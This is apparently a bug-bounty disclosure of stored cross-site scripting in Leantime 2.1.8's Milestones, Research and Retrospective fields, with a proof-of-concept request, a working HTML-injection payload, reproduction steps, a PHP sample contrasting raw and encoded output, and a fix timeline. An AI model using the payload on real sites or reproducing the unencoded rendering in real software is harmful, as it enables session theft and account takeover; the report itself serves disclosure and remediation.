Cross-site Scripting (XSS) - Stored in leantime/leantime


Reported on

Oct 12th 2021


Multiple Stored XSS in the 'Milestones', 'Research' and 'Retrospective' features of Leantime 2.1.8

Proof of Concept

// PoC.req
POST /leantime/public/tickets/editMilestone/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 157
Connection: close
Cookie: sid=e48bc373a563a82ae266820d40707a63b9c0bad4-3cef7db646d7f8424c47025854198bf8d39caede
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Steps to Reproduce


Go to Milestones and choose Add Milestones.

In the 'Milestone Title' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">


Go to Research and, on the Board, choose Add new.

In the 'Hypothesis' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">


Go to Retrospective and, on the Board, choose Add new.

In the 'Description' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
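The root cause in all three fields is the same: a stored value is echoed into the HTML without output encoding, so the leading `">` of the payload closes the enclosing attribute and the browser parses a new `<img>` element. The following is an added illustration, not Leantime's own code; the field name `headline`, the render functions and the card markup are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed sample: the payload from the report, as it would come back
// from the database after being saved through the Milestone form.
$storedTitle = '"><iMg SrC="x" oNeRRor="alert(1);">';

// Vulnerable rendering (hypothetical): the stored title is interpolated raw
// into a value="" attribute. The payload's '">' terminates the attribute and
// the <input> tag, so what follows is parsed as a fresh <img> element whose
// onerror handler runs when the bogus src fails to load.
function renderMilestoneInputVulnerable(string $title): string
{
    return '<input type="text" name="headline" value="' . $title . '">';
}

// Hardened rendering: encode for the HTML context at output time.
// ENT_QUOTES encodes both " and ', so the value can no longer close the
// attribute; < and > become entities, so no new element can be introduced.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function renderMilestoneInputSafe(string $title): string
{
    return '<input type="text" name="headline" value="' . e($title) . '">';
}

// The same encoding applies to element content, which is where the
// Hypothesis and Description fields end up on the Research and
// Retrospective boards (hypothetical card markup).
function renderBoardCardSafe(string $text): string
{
    return '<div class="card">' . e($text) . '</div>';
}

// Self-check: case-insensitive, because the payload uses mixed-case tags.
function containsRawImgTag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

echo renderMilestoneInputVulnerable($storedTitle), PHP_EOL;   // raw <iMg ...> survives
echo renderMilestoneInputSafe($storedTitle), PHP_EOL;         // &quot;&gt;&lt;iMg ... only
echo renderBoardCardSafe($storedTitle), PHP_EOL;

echo 'vulnerable contains raw tag: ', var_export(containsRawImgTag(renderMilestoneInputVulnerable($storedTitle)), true), PHP_EOL;
echo 'safe contains raw tag:       ', var_export(containsRawImgTag(renderMilestoneInputSafe($storedTitle)), true), PHP_EOL;
```

Encoding must happen at the point of output for the specific context (attribute, element content, JavaScript, URL); stripping or filtering tags on input is not a substitute, since the same value may later be rendered in a different context.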

We have contacted a member of the leantime team and are waiting to hear back (2 years ago)
lethanhphuc modified the report (2 years ago)
Marcel Folaron validated this vulnerability (2 years ago)
noobpk has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a (2 years ago)
Marcel Folaron marked this as fixed with commit 22a6da (2 years ago)
lethanhphuc has been awarded the fix bounty
